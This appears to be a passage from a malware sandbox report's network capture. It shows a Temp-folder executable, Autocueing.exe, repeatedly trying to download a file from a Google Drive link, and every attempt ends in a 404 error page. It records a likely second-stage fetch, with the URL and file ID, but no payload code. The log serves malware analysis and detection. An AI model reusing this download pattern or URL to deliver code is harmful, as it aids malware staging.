                                                                                                                                                                                    2025-01-11 04:29:11 UTC417OUTGET /uc?export=download&id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34 HTTP/1.1
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                    Host: drive.google.com
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Cookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
                                                                                                                                                                                    2025-01-11 04:29:12 UTC1920INHTTP/1.1 303 See Other
                                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Sat, 11 Jan 2025 04:29:12 GMT
                                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy: script-src 'nonce-fuy7EvnSyNCH7ZnNVBbd3g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Server: ESF
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Connection: close


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    61192.168.2.650047142.250.185.1294435140C:\Users\user\AppData\Local\Temp\Autocueing.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2025-01-11 04:29:12 UTC459OUTGET /download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
                                                                                                                                                                                    2025-01-11 04:29:13 UTC1851INHTTP/1.1 404 Not Found
                                                                                                                                                                                    X-GUploader-UploadID: AFIdbgSG5Bk7FTZ75QWEBZELc6PAOLgrTzaxhHGFUHVdiMc_xsWtotTyXJVK-EHq7r9bcReU7dxotPg
                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Sat, 11 Jan 2025 04:29:13 GMT
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy: script-src 'nonce-MKNts7zkqtLaJ_EuFWQjTg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    2025-01-11 04:29:13 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 57 34 57 7a 51 42 33 75 51 79 48 63 57 30 64 47 4e 30 76 72 66 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="W4WzQB3uQyHcW0dGN0vrfQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    62192.168.2.650048142.250.185.1424435140C:\Users\user\AppData\Local\Temp\Autocueing.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2025-01-11 04:29:14 UTC417OUTGET /uc?export=download&id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34 HTTP/1.1
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                    Host: drive.google.com
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Cookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
                                                                                                                                                                                    2025-01-11 04:29:14 UTC1920INHTTP/1.1 303 See Other
                                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Sat, 11 Jan 2025 04:29:14 GMT
                                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy: script-src 'nonce-GF4t2KQpD7qgc_E0U9gqMA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Server: ESF
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Connection: close


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    63192.168.2.650049142.250.185.1294435140C:\Users\user\AppData\Local\Temp\Autocueing.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2025-01-11 04:29:15 UTC459OUTGET /download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
                                                                                                                                                                                    2025-01-11 04:29:15 UTC1844INHTTP/1.1 404 Not Found
                                                                                                                                                                                    X-GUploader-UploadID: AFIdbgTCGPqfiCIfF7E4_Y11Zlpi8lHpDbTMaEzto-slDSb-3GjKD6gQan4_sQ8i1GkxpTNa
                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Sat, 11 Jan 2025 04:29:15 GMT
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy: script-src 'nonce-60rpNSTb_L5yiR1PBmRv2w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    2025-01-11 04:29:15 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 73 69 2d 74 66 71 61 74 71 4f 5a 4f 57 48 4a 49 4b 61 63 2d 4b 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="si-tfqatqOZOWHJIKac-Kg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    64192.168.2.650050142.250.185.1424435140C:\Users\user\AppData\Local\Temp\Autocueing.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2025-01-11 04:29:16 UTC417OUTGET /uc?export=download&id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34 HTTP/1.1
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                    Host: drive.google.com
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Cookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
                                                                                                                                                                                    2025-01-11 04:29:16 UTC1920INHTTP/1.1 303 See Other
                                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Sat, 11 Jan 2025 04:29:16 GMT
                                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy: script-src 'nonce-gy4agRKB4X12b50EEvjeRw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Server: ESF
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Connection: close


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    65192.168.2.650051142.250.185.1294435140C:\Users\user\AppData\Local\Temp\Autocueing.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2025-01-11 04:29:17 UTC459OUTGET /download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
                                                                                                                                                                                    2025-01-11 04:29:17 UTC1844INHTTP/1.1 404 Not Found
                                                                                                                                                                                    X-GUploader-UploadID: AFIdbgR7bc2rGpMLGCJvCHpFRm5Gr70P50kJy7IVTs3cJJDbuHvRpXoBoefuvhhteLsfhrTr
                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Sat, 11 Jan 2025 04:29:17 GMT
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy: script-src 'nonce-p8pc-WhDtEl5hMlh9Ti1nA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    2025-01-11 04:29:17 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 77 71 47 78 38 59 5f 4c 53 41 59 46 59 4d 68 6b 6b 35 4c 63 52 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="wqGx8Y_LSAYFYMhkk5LcRg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    66192.168.2.650052142.250.185.1424435140C:\Users\user\AppData\Local\Temp\Autocueing.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2025-01-11 04:29:18 UTC417OUTGET /uc?export=download&id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34 HTTP/1.1
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                    Host: drive.google.com
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Cookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
                                                                                                                                                                                    2025-01-11 04:29:18 UTC1920INHTTP/1.1 303 See Other
                                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Sat, 11 Jan 2025 04:29:18 GMT
                                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Content-Security-Policy: script-src 'nonce-FfgXl-vb7oeh4Bmt1uIRxA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                                                                                    Server: ESF
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Connection: close


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    67192.168.2.650053142.250.185.1294435140C:\Users\user\AppData\Local\Temp\Autocueing.exe
